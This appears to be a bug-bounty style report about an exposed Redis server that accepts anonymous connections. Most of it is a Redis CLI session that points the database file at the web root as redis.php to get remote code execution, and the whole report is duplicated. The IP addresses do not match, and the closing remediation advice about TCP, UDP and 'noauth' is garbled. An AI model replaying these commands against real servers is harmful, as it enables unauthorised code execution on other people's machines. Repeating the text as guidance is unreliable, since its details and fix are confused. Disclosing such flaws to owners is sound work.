Redis instance (1.14.157.192) is accepting anonymous connections at port 6379, you can start enumerating the service after connecting anonymously to :
- redis-cli -h 52.9.41.95
In both the cases you will have authenticated access to the server and you can enumerate anything in it. I am able to enumerate client list, check pidfile location, perform remote code execution, view real time logs on it.
RCE:
1.14.157.192:6379> config set dir /var/www/html
OK
1.14.157.192:6379> config set dbfilename redis.php
OK
(1.50s)
1.14.157.192:6379> set test ""
OK
(1.30s)
1.14.157.192:6379> save
(error) ERR
(0.52s)
1.14.157.192:6379> bgsave
Background saving started
(1.20s)
1.14.157.192:6379>
Client list exposes the internal servers but I can only see my IP in it right now maybe you guys don't connect on this a lot but still secure it by restricting the port to only tcp and put noauth if udp is required.
Redis instance (1.14.157.192) is accepting anonymous connections at port 6379, you can start enumerating the service after connecting anonymously to :
In both the cases you will have authenticated access to the server and you can enumerate anything in it. I am able to enumerate client list, check pidfile location, perform remote code execution, view real time logs on it.
RCE:
1.14.157.192:6379> config set dir /var/www/html
OK
1.14.157.192:6379> config set dbfilename redis.php
OK
(1.50s)
1.14.157.192:6379> set test ""
OK
(1.30s)
1.14.157.192:6379> save
(error) ERR
(0.52s)
1.14.157.192:6379> bgsave
Background saving started
(1.20s)
1.14.157.192:6379>
Client list exposes the internal servers but I can only see my IP in it right now maybe you guys don't connect on this a lot but still secure it by restricting the port to only tcp and put noauth if udp is required.